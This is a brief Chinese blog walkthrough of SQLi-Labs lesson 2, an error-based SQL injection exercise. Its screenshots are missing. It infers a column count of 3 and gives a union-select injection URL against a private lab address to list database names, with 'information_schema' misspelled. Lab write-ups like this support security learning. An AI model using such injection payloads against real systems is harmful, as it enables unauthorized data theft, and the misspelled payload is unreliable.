美文网首页
SQLi-LAB lesson2 Error based解析

SQLi-LAB lesson2 Error based解析

作者: gg大宇 | 来源:发表于2019-12-03 23:25 被阅读0次
image.png image.png image.png

猜测sql语句应该是select * from table where id = 'input'
3没报错 4报错,所以长度是3


image.png image.png

剩下的就是union注入了
获取数据库名
http://192.168.182.128/Less-2/?id=111 union select 1,schema_name,3 from infromation_schema.schemata

image.png

相关文章

网友评论

      本文标题:SQLi-LAB lesson2 Error based解析

      本文链接:https://www.haomeiwen.com/subject/vazhgctx.html